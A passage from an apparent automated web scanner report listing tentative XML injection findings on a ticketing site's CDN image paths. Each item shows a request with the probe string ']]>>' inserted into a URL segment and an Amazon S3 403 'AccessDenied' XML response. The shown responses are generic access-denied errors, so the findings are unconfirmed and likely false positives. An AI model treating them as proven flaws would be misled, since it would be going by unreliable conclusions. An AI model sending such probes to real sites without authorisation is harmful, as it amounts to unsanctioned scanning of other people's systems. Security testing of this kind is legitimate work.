8.40. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-511.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B029DA5A906F0E85
x-amz-id-2: fNr9HdqJRFHVusSGLbGrHvEZYzn90QXn7P8h96BXiSD3CoS2Nmi8PfGkHwx3nAnQ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:02 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: feeb66e859bbfdb13b71c12ed3d3a1a96fc7931aae864b06bcccfcd1c9dfd339bfbc46a4c57c0be9
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B029DA5A906F0E85</RequestId><HostId>fNr9HdqJRFHVusSGLbGrHvEZYzn90QXn7P8h96BXiSD3CoS2Nm
...[SNIP]...

8.41. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 283833231AF10057
x-amz-id-2: hSTCGb3AAHAUz3kCdy8+C/kIC4jcBpNf6qsU/N3wBKWAJw0Otumo5ZJEa1qtXFrw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 47ccf891364858057fcafd1af9a41e79c70ac6569f501218d0b5461e1d979756420196b8aa19e3ee
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>283833231AF10057</RequestId><HostId>hSTCGb3AAHAUz3kCdy8+C/kIC4jcBpNf6qsU/N3wBKWAJw0Otu
...[SNIP]...

8.42. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3057B3A91E3ED804
x-amz-id-2: AjND7tYPJELAo3mTeKM1n687pYd+e2hpDLWcsT90VRWeMCKxxcfXSgYYqcvQ6D0Y
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:56 GMT
Server: AmazonS3
Age: 2
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0173b1f38a2cd1193bfc6f45c4a375e857e2cbd54db7f5cd6b631a10ad1379c9019d2cf2a540150a
Via: 1.0 e81b6793c2bc2378a5c7ea08e930ec3d.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3057B3A91E3ED804</RequestId><HostId>AjND7tYPJELAo3mTeKM1n687pYd+e2hpDLWcsT90VRWeMCKxxc
...[SNIP]...

8.43. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-522.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 196C21C4ADADDD46
x-amz-id-2: q0QZG6H7tG5FwdGTRztpMLtnfDTtPdqoN/4Yn3dPExQRPuM3Edf2K2/OE5jb9Xl0
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:06 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0b5bbdfe6c084cb6d8486dbbc293ee3d17f4a6d0a189674c9571ce2aa0e7df74de79fb80b6d9ef59
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>196C21C4ADADDD46</RequestId><HostId>q0QZG6H7tG5FwdGTRztpMLtnfDTtPdqoN/4Yn3dPExQRPuM3Ed
...[SNIP]...

8.44. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-522.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BD788207A5CAD577
x-amz-id-2: MkDnwADcGyyE9zNlcxePHZ55DEaywhl1v5ZDROHpNoiPZl7usB24uysNlAkWJoDw
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b5f88fdb482c241ec2ecc333b3cd59ea293842f9ac78591d6ab6ed314216b4b91cdc7c06d4652205
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BD788207A5CAD577</RequestId><HostId>MkDnwADcGyyE9zNlcxePHZ55DEaywhl1v5ZDROHpNoiPZl7usB
...[SNIP]...

8.45. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6A407F07BC8E3E59
x-amz-id-2: tYD36vA0+KxQ4rnOrfmYiM/qgMgobV/uns77zJ+SI/TFlUu0Qq65pcS5CSiAixlZ
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:47 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4abcd89af2d9be82e90d9a0a9cf0d25ef93d042913782a7a68cf37680264f0def6a285eaae00856b
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6A407F07BC8E3E59</RequestId><HostId>tYD36vA0+KxQ4rnOrfmYiM/qgMgobV/uns77zJ+SI/TFlUu0Qq
...[SNIP]...

8.46. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B61F7242BD4FCC7D
x-amz-id-2: uJUN2FTZJM2siAt0wGys6hXm9rIp5rei1XPHOX84/34Xfgk4cHTUHxefOijuMGRA
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: a15f30fed158ce096f51d9e01ff56893a1ea5ef5da92ff005af4691a8ca06a30453b7ea4f1119e32
Via: 1.0 577026e4e1f5532985f9826096a733cd.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B61F7242BD4FCC7D</RequestId><HostId>uJUN2FTZJM2siAt0wGys6hXm9rIp5rei1XPHOX84/34Xfgk4cH
...[SNIP]...

8.47. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-529.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E8DF1B1C3648A49F
x-amz-id-2: vnro/XwL2sEhWE/6AzFTI/PiD6UjA2pqnhMtKBz+PfHGbGVuguK1X6qvsbPT/iJx
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c43df31c0c8e190f07a42ae826419f6fef30dbfc134d02f1e964b2390a769db0a3bd7eb11c8302dc
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E8DF1B1C3648A49F</RequestId><HostId>vnro/XwL2sEhWE/6AzFTI/PiD6UjA2pqnhMtKBz+PfHGbGVugu
...[SNIP]...

8.48. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-529.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AF468C8D3B685AC4
x-amz-id-2: nsK7DZkrRIA6n19NUwF7HGD7egoPSdWmK8YaWy70P94X96L5OktOluOa8WMUUm40
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:07 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 18276d97c22a0e6471491b98b3dedaef743b74018f2c59c58e64c56930e800c0276cc256b5559e4b
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AF468C8D3B685AC4</RequestId><HostId>nsK7DZkrRIA6n19NUwF7HGD7egoPSdWmK8YaWy70P94X96L5Ok
...[SNIP]...

8.49. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4E6D4DEE6CE627E8
x-amz-id-2: gl7G7lQlRIE28Sh3irJvlrM+bG7xSisMZBLCS+90mWOB4v5GiwWzwxWY78IU7hpi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:50 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 4edbff9250d504a08d043c86edd0df3c2a1bf6ce7880c2f7084b2c6f4ea37c42c0c6c6231e874d40
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4E6D4DEE6CE627E8</RequestId><HostId>gl7G7lQlRIE28Sh3irJvlrM+bG7xSisMZBLCS+90mWOB4v5Giw
...[SNIP]...

8.50. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/logos/provider-medium-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 655A22BDD32A4CEE
x-amz-id-2: clwTlONbF2TkpxNndY7ovNK3fHnFV9vgqg4nd5tuVJ/ZkhQoIzDaG+9xQFdL0/bg
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 07f8cbd92c16f85f1a0b05b56b2f57e9224145b57cae59372f909b68785cfe932839157c2e07eaab
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>655A22BDD32A4CEE</RequestId><HostId>clwTlONbF2TkpxNndY7ovNK3fHnFV9vgqg4nd5tuVJ/ZkhQoIz
...[SNIP]...

8.51. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos]]>>/provider-medium-549.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0E6432B1CB8BC745
x-amz-id-2: O/7txjJ7tOuzoDXoKhWnL7FHvkB4jAzw7iNxboIQRfP/Ul55fF3cQjZvkzxQAhB9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:10 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 76e0b58d49a61b3c2f0a0183f50000a9f503bdd2057fa74626755568d4989b370b7d45c06843e8c8
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0E6432B1CB8BC745</RequestId><HostId>O/7txjJ7tOuzoDXoKhWnL7FHvkB4jAzw7iNxboIQRfP/Ul55fF
...[SNIP]...

8.52. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-549.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 88C6B85D02E73D34
x-amz-id-2: Cwr40e6Q7CFz4dRxIfeYBXMRBnAIg/2Vh1c90YReEAYr2kewnlDS2MuRTYp+fpNB
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:16 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 2b1c453d4ca92a8393e71999bae5a1ac4402ef6f3923e6a68808f8b6712a0e614d7322825cea70ec
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>88C6B85D02E73D34</RequestId><HostId>Cwr40e6Q7CFz4dRxIfeYBXMRBnAIg/2Vh1c90YReEAYr2kewnl
...[SNIP]...

8.53. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-664.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/logos/provider-medium-664.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
